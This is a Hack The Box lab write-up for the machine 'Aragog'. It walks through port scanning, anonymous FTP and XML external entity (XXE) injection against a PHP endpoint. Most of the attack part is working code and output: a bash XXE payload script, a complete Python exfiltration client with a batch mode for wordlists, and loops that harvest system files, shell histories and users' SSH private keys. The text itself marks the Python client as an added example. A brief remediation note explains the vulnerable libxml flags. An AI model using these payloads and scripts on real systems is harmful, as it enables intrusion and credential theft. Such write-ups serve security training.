Aragog

From Luniwiki

Aragog01.png

Port scan

u505@naos:~/HTB/Machines$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.78

Starting masscan 1.0.5 at 2021-01-17 15:05:33 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 21/tcp on 10.10.10.78
Discovered open port 22/tcp on 10.10.10.78
Discovered open port 80/tcp on 10.10.10.78
u505@naos:~/HTB/Machines/Aragog$ nmap -sC -sV aragog
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-17 10:05 EST
Nmap scan report for aragog (10.10.10.78)
Host is up (0.039s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds

FTP

The FTP service accepts anonymous logins. The root directory contains a single file, test.txt, and uploads are denied (550 Permission denied), so the server is read-only for us.

u505@naos:~/HTB/Machines/Aragog$ ftp aragog
Connected to aragog.
220 (vsFTPd 3.0.3)
Name (aragog:u505): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.
ftp> get test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (86 bytes).
226 Transfer complete.
86 bytes received in 0.00 secs (717.8151 kB/s)
ftp> put u505
local: u505 remote: u505
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> quit
221 Goodbye.

The file is a small XML document containing a subnet mask and an empty test element.

u505@naos:~/HTB/Machines/Aragog$ cat test.txt
<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>

SSH

SSH is open. No password prompt is shown: the server immediately answers Permission denied (publickey), meaning public-key authentication is the only method it offers. We will need a valid private key for an existing user.

u505@naos:~/HTB/Machines/Aragog$ ssh u505@aragog
The authenticity of host 'aragog (10.10.10.78)' can't be established.
ECDSA key fingerprint is SHA256:phu0FjQg/9nCmL2014AJ9yH4akvraA7Ea5QtE59wqD4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'aragog,10.10.10.78' (ECDSA) to the list of known hosts.
u505@aragog: Permission denied (publickey).

Web

The web server serves the default Apache installation page.

Aragog02.png

Dirsearch

Dirsearch found a hosts.php page.

u505@naos:~/HTB/Machines/Aragog$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,php,html" -f -t 100 -u http://aragog
/opt/utils/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.2) or chardet (4.0.0) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "

dirsearch v0.4.1
Extensions: txt, php, html | HTTP method: GET | Threads: 100 | Wordlist size: 23052
Error Log: /opt/utils/dirsearch/logs/errors-21-01-17_10-12-33.log
Target: http://aragog/
Output File: /opt/utils/dirsearch/reports/aragog/_21-01-17_10-12-33.txt
[10:12:33] Starting:
[10:12:33] 403 -  289B - /.hta.txt
[10:12:38] 403 -  286B - /.hta/
[10:12:38] 403 -  295B - /.htaccess.html
[10:12:41] 403 -  295B - /.htpasswd.html
[10:12:42] 403 -  290B - /.hta.html
[10:12:42] 403 -  294B - /.htpasswd.txt
[10:12:43] 403 -  289B - /.hta.php
[10:12:46] 403 -  294B - /.htpasswd.php
[10:12:46] 403 -  294B - /.htaccess.php
[10:13:02] 200 -   46B - /hosts.php
[10:13:03] 403 -  287B - /icons/
[10:13:03] 200 -   11KB - /index.html
[10:13:22] 403 -  295B - /server-status/
[10:13:22] 403 -  294B - /server-status
Task Completed

Page hosts.php

Aragog03.png

u505@naos:~/HTB/Machines/Aragog$ curl http://aragog/hosts.php

There are 4294967294 possible hosts for

The sentence is cut off after "for". 4294967294 is 2^32 - 2, the usable-host count you get from an empty (all-zero) mask, so the page evidently expects a subnet mask as input and received none. At first I tried to discover the parameter name by fuzzing GET parameters with wfuzz, hiding responses of the same 46-byte length.

u505@naos:~/HTB/Machines/Aragog$ wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt --hh 46 -u http://aragog/hosts.php?FUZZ=test
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://aragog/hosts.php?FUZZ=test
Total requests: 2588
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

Total time: 0
Processed Requests: 2588
Filtered Requests: 2588
Requests/sec.: 0

Every parameter name produced the same 46-byte response. Eventually I POSTed the file downloaded from the FTP server as the raw request body, and this time the answer changed:

u505@naos:~/HTB/Machines/Aragog$ curl -X POST -d @test.txt http://aragog/hosts.php

There are 62 possible hosts for 255.255.255.192

XML external entity injection (XXE)

hosts.php parses the POSTed XML body with external entities enabled, so it is vulnerable to XML External Entity (XXE) injection: a DOCTYPE that declares an entity pointing at a local file makes the server read that file and echo its contents back after "possible hosts for". This lets us exfiltrate arbitrary files readable by the web server user.

Aragog04.png

After a few tests, /etc/passwd was successfully exfiltrated. The following helper script automates the request for any path:

u505@naos:~/HTB/Machines/Aragog$ cat filescontent.sh
#!/bin/bash
# Usage: ./filescontent.sh /absolute/path
# The entity points at a php://filter base64 stream, so the file is returned
# base64-encoded inside the "possible hosts for ..." sentence.
payload="<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=$1\"> ]><details><subnet_mask>&xxe;</subnet_mask><test></test></details>"
tmp=$(mktemp)
printf '%s' "$payload" > "$tmp"
# Response is "There are N possible hosts for <base64>": field 7 is the payload.
# tr strips CR and LF so the blank lines around the sentence do not survive.
resb64=$(curl -s -X POST -d @"$tmp" http://aragog/hosts.php | awk '{print $7}' | tr -d '\r\n')
rm -f "$tmp"
if [ -n "$resb64" ]; then
        printf '%s' "$resb64" | base64 -d
fi

The script wraps the requested path in a php://filter base64 stream, so the file comes back base64-encoded. That matters for two reasons: the raw bytes never pass through the XML parser (a file containing < or & would otherwise break the document), and PHP files are returned as source instead of being executed. For example, the source of hosts.php itself:

u505@naos:~/HTB/Machines/Aragog$ ./filescontent.sh /var/www/html/hosts.php
<?php

libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$details = simplexml_import_dom($dom);
$mask = $details->subnet_mask;
//echo "\r\nYou have provided subnet $mask\r\n";
$max_bits = '32';
$cidr = mask2cidr($mask);
$bits = $max_bits - $cidr;
$hosts = pow(2,$bits);
echo "\r\nThere are " . ($hosts - 2) . " possible hosts for $mask\r\n\r\n";
function mask2cidr($mask){
    $long = ip2long($mask);
    $base = ip2long('255.255.255.255');
    return 32-log(($long ^ $base)+1,2);
}
?>
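The source explains the root cause: libxml_disable_entity_loader(false) re-enables fetching of external resources, and LIBXML_NOENT is the flag that substitutes entity references when the document is parsed. Removing both (the loader has been disabled by default since PHP 8.0) closes the hole without touching the subnet calculation. It also explains why every exfiltration response reports 4294967294 hosts: the base64 blob is not a valid dotted mask, ip2long() returns false, and the arithmetic falls back to the all-zero case.

The block below is an added example, not code from this write-up or from the target: a Python version of filescontent.sh with stricter parsing (it validates the base64 instead of trusting awk's seventh field) and a batch mode for path lists such as the LFISuite wordlist and the per-user dotfile loop used later on the page. The target URL and the response format are the ones shown above; the sample response embedded in the block is constructed so the parser can be exercised offline.

```python
"""XXE exfiltration client for a hosts.php-style endpoint (added example)."""
import base64
import binascii
import re
import urllib.error
import urllib.request
from typing import Dict, Iterable, Optional

TARGET_URL = "http://aragog/hosts.php"  # assumed from the write-up; adjust as needed

# The server echoes the resolved entity after "possible hosts for ".
_RESPONSE_RE = re.compile(r"possible hosts for\s*(\S*)")


def build_payload(path: str) -> bytes:
    """Build the XXE document for one file.

    The entity points at a php://filter stream so the file comes back base64
    encoded: the raw bytes never reach libxml (a '<' or '&' in the file would
    otherwise break the XML) and PHP source is returned instead of executed.
    """
    if '"' in path or "&" in path:
        raise ValueError("path would break the DOCTYPE quoting")
    doc = (
        "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "
        f'"php://filter/convert.base64-encode/resource={path}"> ]>'
        "<details><subnet_mask>&xxe;</subnet_mask><test></test></details>"
    )
    return doc.encode()


def parse_response(text: str) -> Optional[bytes]:
    """Return the decoded file, or None if the entity resolved to nothing.

    Anything that is not valid base64 (e.g. a real mask such as
    255.255.255.192 being echoed back) is treated as 'no file'.
    """
    m = _RESPONSE_RE.search(text)
    if not m or not m.group(1):
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None


def exfiltrate(path: str, url: str = TARGET_URL, timeout: float = 10.0) -> Optional[bytes]:
    """POST the payload and return the file contents (None if unreadable)."""
    req = urllib.request.Request(
        url, data=build_payload(path), method="POST",
        headers={"Content-Type": "application/xml"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_response(resp.read().decode("utf-8", "replace"))


def exfiltrate_many(paths: Iterable[str], url: str = TARGET_URL) -> Dict[str, bytes]:
    """Batch mode for wordlists (LFISuite paths, dotfiles per home directory).

    Unreadable or empty files are skipped, as are transport errors, so a long
    list can run unattended and only hits are returned.
    """
    found: Dict[str, bytes] = {}
    for p in paths:
        try:
            data = exfiltrate(p, url)
        except (urllib.error.URLError, OSError):
            continue
        if data:
            found[p] = data
    return found


# Constructed sample response in the exact shape hosts.php returns, so the
# parser can be checked without a target.
SAMPLE_FILE = (b"root:x:0:0:root:/root:/bin/bash\n"
               b"florian:x:1000:1000:florian,,,:/home/florian:/bin/bash\n")
SAMPLE_RESPONSE = ("\r\nThere are 4294967294 possible hosts for "
                   + base64.b64encode(SAMPLE_FILE).decode() + "\r\n\r\n")
EMPTY_RESPONSE = "\r\nThere are 4294967294 possible hosts for \r\n\r\n"
MASK_RESPONSE = "\r\nThere are 62 possible hosts for 255.255.255.192\r\n\r\n"

if __name__ == "__main__":
    import sys
    for p in sys.argv[1:] or ["/etc/passwd"]:
        data = exfiltrate(p)
        sys.stdout.write(data.decode("utf-8", "replace") if data else f"{p}: empty\n")
```

Run it as `python3 xxe.py /etc/passwd /var/www/html/hosts.php`; feed a wordlist through `exfiltrate_many()` to reproduce the enumeration loops that follow.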

XXE enumeration

LFISuite files

The path list from LFISuite (pathtotest_huge.txt) is a good set of files to check. Entries under /proc/self/fd/ are skipped, and only paths that return content are printed.

u505@naos:~/HTB/Machines/Aragog$ curl -s https://raw.githubusercontent.com/D35m0nd142/LFISuite/master/pathtotest_huge.txt | grep "^/" | grep -v "/proc/self/fd/" | while read -r f
do
        content=$(./filescontent.sh "$f")
        # Keep the expansion quoted: unquoted, a '*' inside a file (e.g. in a
        # comment line) would be glob-expanded against the local directory.
        if [ -n "${content}" ] ; then
                echo "$f"
                echo "${content}"
                echo "------------------------------------------------------"
        fi
done
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
florian:x:1000:1000:florian,,,:/home/florian:/bin/bash
cliff:x:1001:1001::/home/cliff:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:123:130:ftp daemon,,,:/srv/ftp:/bin/false
------------------------------------------------------
/etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
audio:x:29:pulse
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-timesync:x:102:
systemd-network:x:103:
systemd-resolve:x:104:
systemd-bus-proxy:x:105:
input:x:106:
crontab:x:107:
syslog:x:108:
netdev:x:109:
messagebus:x:110:
uuidd:x:111:
ssl-cert:x:112:
lpadmin:x:113:
lightdm:x:114:
nopasswdlogin:x:115:
ssh:x:116:
whoopsie:x:117:
mlocate:x:118:
avahi-autoipd:x:119:
avahi:x:120:
bluetooth:x:121:
scanner:x:122:saned
colord:x:123:
pulse:x:124:
pulse-access:x:125:
rtkit:x:126:
saned:x:127:
florian:x:1000:
sambashare:x:128:
mysql:x:129:
cliff:x:1001:
ftp:x:130:
------------------------------------------------------
-bash: warning: command substitution: ignored null byte in input
/proc/self/cmdline
/usr/sbin/apache2-kstart
------------------------------------------------------
/proc/self/stat
2000 (apache2) R 1124 1124 1124 0 -1 4194624 18861 0 15 0 1302 80 0 0 20 0 1 0 111114 330723328 18778 18446744073709551615 94413955706880 94413956338884 140735249656032 0 0 0 0 16781312 201344747 0 0 0 17 0 0 0 18816720 0 0 94413958439944 94413958464392 94413983608832 140735249661626 140735249661653 140735249661653 140735249661926 0
------------------------------------------------------
/proc/self/status
Name:   apache2
Umask:  0022
State:  R (running)
Tgid:   2026
Ngid:   0
Pid:    2026
PPid:   1124
TracerPid:      0
Uid:    33      33      33      33
Gid:    33      33      33      33
FDSize: 64
Groups: 33
NStgid: 2026
NSpid:  2026
NSpgid: 1124
NSsid:  1124
VmPeak:   337460 kB
VmSize:   323128 kB
VmLck:         0 kB
VmPin:         0 kB
VmHWM:     85356 kB
VmRSS:     75116 kB
RssAnon:    7588 kB
RssFile:    8056 kB
RssShmem:  59472 kB
VmData:     7512 kB
VmStk:       132 kB
VmExe:       620 kB
VmLib:     53612 kB
VmPTE:       572 kB
VmPMD:        12 kB
VmSwap:      328 kB
HugetlbPages:          0 kB
Threads:        1
SigQ:   0/3644
SigPnd: 0000000000000000
ShdPnd: 0000000000000000
SigBlk: 0000000000000000
SigIgn: 0000000001001000
SigCgt: 000000018c0046eb
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
NoNewPrivs:     0
Seccomp:        0
Cpus_allowed:   ffffffff,ffffffff,ffffffff,ffffffff
Cpus_allowed_list:      0-127
Mems_allowed:   00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001
Mems_allowed_list:      0
voluntary_ctxt_switches:        3206
nonvoluntary_ctxt_switches:     5404
------------------------------------------------------
/etc/mysql/my.cnf
#
# The MySQL database server configuration file.
#
# You can copy this to one of:
# - "/etc/mysql/my.cnf" to set global options,
# - "~/.my.cnf" to set user-specific options.
#
# One can use all long options that the program supports.
# Run program with --help to get a list of available options and with
# --print-defaults to see which it would actually understand and use.
#
# For explanations see
# http://dev.mysql.com/doc/mysql/en/server-system-variables.html

#
# * IMPORTANT: Additional settings that can override those from this file!
#   The files must end with '.cnf', otherwise they'll be ignored.
#
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/
------------------------------------------------------
/etc/vsftpd.conf
# Example config file /etc/vsftpd.conf
#
# The default compiled in settings are fairly paranoid. This sample file
# loosens things up a bit, to make the ftp daemon more usable.
# Please see vsftpd.conf.5 for all compiled in defaults.
#
# READ THIS: This example file is NOT an exhaustive list of vsftpd options.
# Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
# capabilities.
#
#
# Run standalone?  vsftpd can run either from an inetd or as a standalone
# daemon started from an initscript.
listen=NO
#
# This directive enables listening on IPv6 sockets. By default, listening
# on the IPv6 "any" address (::) will accept connections from both IPv6
# and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6
# sockets. If you want that (perhaps because you want to listen on specific
# addresses) then you must run two copies of vsftpd with two configuration
# files.
listen_ipv6=YES
#
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=YES
#
# Uncomment this to allow local users to log in.
local_enable=NO
#
# Uncomment this to enable any form of FTP write command.
#write_enable=YES
#
# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
#local_umask=022
#
# Uncomment this to allow the anonymous FTP user to upload files. This only
# has an effect if the above global write enable is activated. Also, you will
# obviously need to create a directory writable by the FTP user.
#anon_upload_enable=YES
#
# Uncomment this if you want the anonymous FTP user to be able to create
# new directories.
#anon_mkdir_write_enable=YES
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES
#
# If enabled, vsftpd will display directory listings with the time
# in your local time zone. The default is to display GMT. The
# times returned by the MDTM FTP command are also affected by this
# option.
use_localtime=YES
#
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
#
# If you want, you can arrange for uploaded anonymous files to be owned by
# a different user. Note! Using "root" for uploaded files is not
# recommended!
#chown_uploads=YES
#chown_username=whoever
#
# You may override where the log file goes if you like. The default is shown
# below.
#xferlog_file=/var/log/vsftpd.log
#
# If you want, you can have your log file in standard ftpd xferlog format.
# Note that the default log file location is /var/log/xferlog in this case.
#xferlog_std_format=YES
#
# You may change the default value for timing out an idle session.
#idle_session_timeout=600
#
# You may change the default value for timing out a data connection.
#data_connection_timeout=120
#
# It is recommended that you define on your system a unique user which the
# ftp server can use as a totally isolated and unprivileged user.
#nopriv_user=ftpsecure
#
# Enable this and the server will recognise asynchronous ABOR requests. Not
# recommended for security (the code is non-trivial). Not enabling it,
# however, may confuse older FTP clients.
#async_abor_enable=YES
#
# By default the server will pretend to allow ASCII mode but in fact ignore
# the request. Turn on the below options to have the server actually do ASCII
# mangling on files when in ASCII mode.
# Beware that on some FTP servers, ASCII support allows a denial of service
# attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
# predicted this attack and has always been safe, reporting the size of the
# raw file.
# ASCII mangling is a horrible feature of the protocol.
#ascii_upload_enable=YES
#ascii_download_enable=YES
#
# You may fully customise the login banner string:
#ftpd_banner=Welcome to blah FTP service.
#
# You may specify a file of disallowed anonymous e-mail addresses. Apparently
# useful for combatting certain DoS attacks.
#deny_email_enable=YES
# (default follows)
#banned_email_file=/etc/vsftpd.banned_emails
#
# You may restrict local users to their home directories. See the FAQ for
# the possible risks in this before using chroot_local_user or
# chroot_list_enable below.
#chroot_local_user=YES
#
# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
# users to NOT chroot().
# (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
# the user does not have write access to the top level directory within the
# chroot)
#chroot_local_user=YES
#chroot_list_enable=YES
# (default follows)
#chroot_list_file=/etc/vsftpd.chroot_list
#
# You may activate the "-R" option to the builtin ls. This is disabled by
# default to avoid remote users being able to cause excessive I/O on large
# sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
# the presence of the "-R" option, so there is a strong case for enabling it.
#ls_recurse_enable=YES
#
# Customization
#
# Some of vsftpd's settings don't fit the filesystem layout by
# default.
#
# This option should be the name of a directory which is empty. Also, the
# directory should not be writable by the ftp user. This directory is used
# as a secure chroot() jail at times vsftpd does not require filesystem
# access.
secure_chroot_dir=/var/run/vsftpd/empty
#
# This string is the name of the PAM service vsftpd will use.
pam_service_name=vsftpd
#
# This option specifies the location of the RSA certificate to use for SSL
# encrypted connections.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO
#
# Uncomment this to indicate that vsftpd use a utf8 filesystem.
#utf8_filesystem=YES
#
# Home directory.
anon_root=/var/ftp/pub
#
# Stop prompting for a password on the command line.
no_anon_password=YES
#
# Show the user and group as ftp:ftp, regardless of the owner.
hide_ids=YES
#
# Limit the range of ports that can be used for passive FTP
pasv_min_port=40000
pasv_max_port=50000
------------------------------------------------------

/etc/passwd

Filtering out accounts without a usable shell leaves two real users, florian and cliff, each with a home directory under /home.

u505@naos:~/HTB/Machines/Aragog$ ./filescontent.sh /etc/passwd | grep -v "/bin/false" | grep -v "/usr/sbin/nologin"
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
florian:x:1000:1000:florian,,,:/home/florian:/bin/bash
cliff:x:1001:1001::/home/cliff:/bin/bash

Based on my own home directory and on other write-ups, I assembled a list of dotfiles worth looking for in each user's home (shell histories, editor state, X/ICE cookies and, above all, SSH key material).

u505@naos:~/HTB/Machines/Aragog$ cat homedir.txt
.bash_history
.bash_logout
.bashrc
.gdb_history
.gdbinit
.hushlogin
.ICEauthority
.mysql_history
.nc_history
.profile
.viminfo
.vimrc
.wget-hsts
.Xauthority
.ssh/authorized_keys
.ssh/known_hosts
.ssh/id_rsa
.ssh/id_rsa.pub
.zsh_history
.zshrc
.kshrc
.mailrc
.lastlogin
.login
.cshrc

A double loop requests each of these files from both home directories. Only florian's home yields anything; every cliff entry comes back empty (absent, or not readable by www-data). Most notably, florian's .ssh/id_rsa is readable by the web server user, so the XXE hands us his SSH private key.

u505@naos:~/HTB/Machines/Aragog$ echo -e "/home/florian\n/home/cliff" | while read -r dir
do
        # Inner loop reads the dotfile list from the file directly, so it does
        # not consume the outer loop's stdin.
        while read -r f
        do
                echo "${dir}/${f}"
                ./filescontent.sh "${dir}/${f}"
                echo "----------------------"
        done < homedir.txt
done
/home/florian/.bash_history
groups
cat /etc/passwd
su root
sudo -l
cat /etc/groups
cat /etc/group
grep "lxd" /etc/group
grep "cliff" /etc/group
grep "lxd" /etc/group
init 0
su root
----------------------
/home/florian/.bash_logout
# ~/.bash_logout: executed by bash(1) when login shell exits.

# when leaving the console clear the screen to increase privacy

if [ "$SHLVL" = 1 ]; then
    [ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q
fi
----------------------
/home/florian/.bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar

# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color|*-256color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
        # We have color support; assume it's compliant with Ecma-48
        # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
        # a case would tend to support setf rather than setaf.)
        color_prompt=yes
    else
        color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'

    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi

# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'

# Add an "alert" alias for long running commands.  Use like so:
#   sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi
----------------------
/home/florian/.gdb_history
----------------------
/home/florian/.gdbinit
----------------------
